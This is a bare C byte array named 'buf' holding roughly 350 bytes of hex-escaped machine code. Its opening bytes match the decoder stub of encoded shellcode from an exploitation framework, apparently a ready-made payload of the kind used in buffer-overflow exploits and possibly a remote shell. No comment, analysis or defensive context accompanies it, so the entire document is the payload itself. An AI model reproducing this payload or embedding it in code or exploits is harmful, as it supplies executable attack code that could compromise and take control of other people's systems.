unsigned char buf[] = 
"\xbf\xb7\x1a\xad\x15\xdd\xc0\xd9\x74\x24\xf4\x5d\x31\xc9\xb1"
"\x52\x31\x7d\x12\x83\xc5\x04\x03\xca\x14\x4f\xe0\xc8\xc1\x0d"
"\x0b\x30\x12\x72\x85\xd5\x23\xb2\xf1\x9e\x14\x02\x71\xf2\x98"
"\xe9\xd7\xe6\x2b\x9f\xff\x09\x9b\x2a\x26\x24\x1c\x06\x1a\x27"
"\x9e\x55\x4f\x87\x9f\x95\x82\xc6\xd8\xc8\x6f\x9a\xb1\x87\xc2"
"\x0a\xb5\xd2\xde\xa1\x85\xf3\x66\x56\x5d\xf5\x47\xc9\xd5\xac"
"\x47\xe8\x3a\xc5\xc1\xf2\x5f\xe0\x98\x89\x94\x9e\x1a\x5b\xe5"
"\x5f\xb0\xa2\xc9\xad\xc8\xe3\xee\x4d\xbf\x1d\x0d\xf3\xb8\xda"
"\x6f\x2f\x4c\xf8\xc8\xa4\xf6\x24\xe8\x69\x60\xaf\xe6\xc6\xe6"
"\xf7\xea\xd9\x2b\x8c\x17\x51\xca\x42\x9e\x21\xe9\x46\xfa\xf2"
"\x90\xdf\xa6\x55\xac\x3f\x09\x09\x08\x34\xa4\x5e\x21\x17\xa1"
"\x93\x08\xa7\x31\xbc\x1b\xd4\x03\x63\xb0\x72\x28\xec\x1e\x85"
"\x4f\xc7\xe7\x19\xae\xe8\x17\x30\x75\xbc\x47\x2a\x5c\xbd\x03"
"\xaa\x61\x68\x83\xfa\xcd\xc3\x64\xaa\xad\xb3\x0c\xa0\x21\xeb"
"\x2d\xcb\xeb\x84\xc4\x36\x7c\xa1\x13\x1b\xef\xdd\x21\x5b\x1e"
"\x42\xaf\xbd\x4a\x6a\xf9\x16\xe3\x13\xa0\xec\x92\xdc\x7e\x89"
"\x95\x57\x8d\x6e\x5b\x90\xf8\x7c\x0c\x50\xb7\xde\x9b\x6f\x6d"
"\x76\x47\xfd\xea\x86\x0e\x1e\xa5\xd1\x47\xd0\xbc\xb7\x75\x4b"
"\x17\xa5\x87\x0d\x50\x6d\x5c\xee\x5f\x6c\x11\x4a\x44\x7e\xef"
"\x53\xc0\x2a\xbf\x05\x9e\x84\x79\xfc\x50\x7e\xd0\x53\x3b\x16"
"\xa5\x9f\xfc\x60\xaa\xf5\x8a\x8c\x1b\xa0\xca\xb3\x94\x24\xdb"
"\xcc\xc8\xd4\x24\x07\x49\xf4\xc6\x8d\xa4\x9d\x5e\x44\x05\xc0"
"\x60\xb3\x4a\xfd\xe2\x31\x33\xfa\xfb\x30\x36\x46\xbc\xa9\x4a"
"\xd7\x29\xcd\xf9\xd8\x7b";
